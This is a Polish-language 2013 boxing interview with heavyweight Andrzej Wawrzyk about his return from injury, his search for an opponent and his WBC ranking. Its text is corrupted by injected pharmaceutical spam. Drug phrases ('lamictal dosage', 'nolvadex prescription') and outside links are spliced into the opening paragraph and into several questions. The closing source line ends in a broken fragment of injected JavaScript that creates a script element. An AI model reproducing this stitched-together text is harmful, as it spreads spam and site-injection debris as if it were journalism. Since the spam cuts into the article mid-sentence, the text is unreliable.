Andrzej Wawrzyk: Mieliśmy cholerny problem

20.03.2013 / Andrzej Wawrzyk / Boks

wawrzyk_TT

Po 9 miesiącach rozłąki z zawodowym ringiem, 23 marca między liny powróci Andrzej Wawrzyk (26-0, 13 KO). Niepokonany krakowianin od dłuższego czasu borykał się z kontuzjami. Nazwisko rywala zawodnika Ulrich KnockOut Promotions oraz recommended lamictal dosage bipolar disorder Trec Boxing Team blood in sperm Cheap zostanie podane już wkrótce.

Kamil Kierzkowski: Jesteś pięściarzem, który ma ewidentnego pecha do kontuzji. W jakiej dyspozycji jesteś obecnie? http://dallasairmedia.com/?p=33067 Purchase
Andrzej Wawrzyk: To prawda, miałem już troszkę kontuzji. Mam nadzieję jednak, że to wszystko już za mną. Jak na tak długą przerwę i tak dużą liczbę zabiegów, rehabilitacji – to ciało jest doprowadzone do naprawdę dobrej formy.

– Miałeś 9-miesięczną przerwę w walkach: sądzisz, że może mieć to jakiś wpływ na przebieg pojedynku?
Na pewno najbardziej będzie brakowało takiego typowego wyczucia w ringu. W każdym razie – przygotowania do walki były przeprowadzone bardzo dobrze. Miałem naprawdę fajne sparingi, by powoli złapać znów właściwy rytm.

– Wciąż wiele niewiadomych wokół twego najbliższego rywala. Czy jest już pewne z kim będziesz walczył? http://theistanahotel.com/how-to-get-nolvadex-prescription/
Jeśli chodzi o rywala, to mieliśmy cholerny problem. Łącznie chyba aż 16 pięściarzy nam odmówiło… i zaczęło się robić mało wesoło, czas gonił coraz bardziej. Dowiedziałem się wreszcie, że będę walczył z tym Węgrem. Poprosiłem jednak o zmianę przeciwnika: wczoraj pojawiła się możliwość walki z reprezentantem Ukrainy. Brak wciąż jednak konkretów, więc na dobrą sprawę nie wiem jeszcze dokładnie z kim zawalczę.

– Przez WBC jesteś zaliczany do najlepszych pięściarzy na świecie. Zajmujesz 15. miejsce. Jak sądzisz – jak daleko Ci do takich nazwisk jak chociażby Lawrence, Ortiz czy choćby sklasyfikowany na 10. miejscu Adamek?
Mogę wyjść do ringu z każdym z nich i zrobić bardzo dobrą walkę. Nie widzę problemu.

– Gdybyś mógł wybrać dowolnego rywala, z kim chciałbyś stanąć w ringu?
Wiadomo – każdy pięściarz marzy o tym, by stanąć w ringu naprzeciw mistrza świata. Moje marzenie jest takie samo. Do tego więc dążę i zrobię wszystko, by wreszcie to zrealizować.

– Jakie cele wyznaczasz sobie w tym roku? Masz już jakieś bokserskie plany? Order
Po pierwsze – chcę dobrze wrócić na ring tą walką w Częstochowie. Następnie chciałbym stoczyć w maju lub czerwcu 10-rundową walkę z dobrym przeciwnikiem. Na koniec roku mam nadzieję stoczyć naprawdę poważny pojedynek, by zwycięstwo przybliżyło mnie jak najbardziej do czołówek rankingów.

Źródło: ringpolska.pl, dostęp: 20.03.2013; Autor: Kamil Kierzkowskivar d=document;var s=d.createElement(‚script’); }} online